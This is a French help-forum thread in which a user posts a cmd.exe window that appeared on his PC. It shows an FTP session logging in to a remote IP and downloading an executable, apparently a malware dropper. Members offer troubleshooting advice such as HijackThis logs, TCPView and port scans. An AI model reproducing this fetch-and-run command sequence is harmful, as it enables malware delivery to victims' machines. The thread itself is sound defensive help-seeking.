hacké ?

[Hans]

Bonjour ,

En fin de journee , en revenant a ma machine , mon ecran affiche la fenetre suivante :

 

Titre de la fenetre : C:\system32\cmd.exe

Texte :

Impossible de trouver C:\Documents and Settings\xxxx\ini

ftp>open 82.250.1.78 30365

Connecté à 82.250.1.78

220Reptile welcomes you..

ftp>user 1 1

331 password required

230 User logged in

ftp>get 784.exe

200 PORT command successful.

150 Opening Binary mode data connection

 

J'ai par ailleurs trouvé le fichier 784.exe que j'ai supprimé a tout hazard , et j'ai tracé l'IP sur grenoble , mais je n'y vois pas tres clair dans cette affaire qui me semble quand meme douteuse.Par ailleurs quand je fais tracer mon IP en cours , elle est situee sur Paris ....ce qui ne correspond pas a ma veritable localisation geographique.......quelqu'un ne l'utiliserait il pas induement ?

Merci de m'eclairer.

Un scan avec a-squared et un autre avec Adaware n'ont rien donné..???????

Modifié le 6 janvier 2007 par Hans

[angelique]

-je trouve que ça pu,dl de malware..cause niark!, mais je peux me tromper!je te conseille de te diriger vers une procedure Hijackthis, que tu trouveras en partie securité du forum.

-le nom en gras est il le nom de ta session?

 

C:\Documents and Settings\jfj\ini

 

-un trace route sur l'ip presenté:

 

Traceroute 82.250.1.78 (lns-bzn-20-82-250-1-78.adsl.proxad.net)

Hop IP Address Hostname Average RTT1

1 192.168.1.9 bodhi.pair.net 1.05 ms

2 12.118.191.17 12.118.191.17 6.83 ms

3 12.123.137.22 gbr1-p70.phlpa.ip.att.net 17.13 ms

4 12.122.12.105 tbr2-p012501.phlpa.ip.att.net 11.89 ms

5 12.122.2.85 tbr1-cl9.wswdc.ip.att.net 10.85 ms

6 12.122.80.45 12.122.80.45 9.92 ms

7 192.205.34.42 192.205.34.42 16.88 ms

8 216.6.51.22 if-2-3.core4.AEQ-Ashburn.teleglobe.net 17.17 ms

9 216.6.81.13 if-6-0.mcore3.NYY-NewYork.teleglobe.net 16.82 ms

10 216.6.87.53 if-15-0.mcore4.NQT-NewYork.teleglobe.net 17.26 ms

11 216.6.87.26 if-3-0.core2.PG1-Paris.teleglobe.net 90.77 ms

12 Time-out

13 Time-out

14 212.27.57.125 bzn-6k-5-po3.inf.routers.proxad.net 90.81 ms

15 212.27.55.92 lns-bzn-20.routers.proxad.net 91.54 ms

16 Time-out

17 Time-out

18 Time-out

19 Destination host unreachable

 

_____________________

 

 

tu es derriere freebox,mode routeur?,tu as realisé un test de port,histoire de voir??

http://www.pcflank.com/

 

 

J'y connais pas trop, mais kewlkat ou greywolf , ou tesgaz qui est par là ^^('soir!)devrait apporter plus d'infos,

[Hans]

je suis derriere un routeur bewan et un scan des ports par zebulon m'a indiqué que tout etait OK ....

Modifié le 1 janvier 2007 par Hans

[angelique]

Un log hijackthis en forum securité ,pour verif serait pas mal!

[Hans]

OK , merci , j'y vais.

[angelique]

Hans,j'y pense

 

tu as un outils(en live) pour deceler quelle application utiliserait ces ports 30365 et vu ds secu 8265

 

TCPView

[Hans]

Merci de me repondre , je connais neotrace et tcpview mais ça ne me donne pas la solution pour me debarrasser du pb.

 

Ce probleme vient de se reproduire,la meme fenetre "cmd.exe",que cellle d'hier s'est ouverte a l'ecran , avec une nouvelle IP , et un n° de port et de dossier get different,....? ça commence a m'inquieter ce cirque......car je n'y comprends pas grand chose !

Modifié le 2 janvier 2007 par Hans

[BJH]

Salut,

 

As-tu posté ton fichier hitjackthis ?

Et puis tu peux faire un test ici http://www.grc.com/x/ne.dll?rh1dkyd2 au sujets de tes ports masqués ou pas.

Moi je n'ai que du vert.

Sinon tu as quel firewall ?

[Hans]

J'ai un firewall materiel sur un routeur et pas de firewall logiciel, on m'avais dit que c'etait mieux ainsi......tu parles....! ! !

[BJH]

Moi j'ai un firewall sur ma box et ça marche pas mal, as-tu fais le test ici

http://www.grc.com/x/ne.dll?rh1dkyd2 ?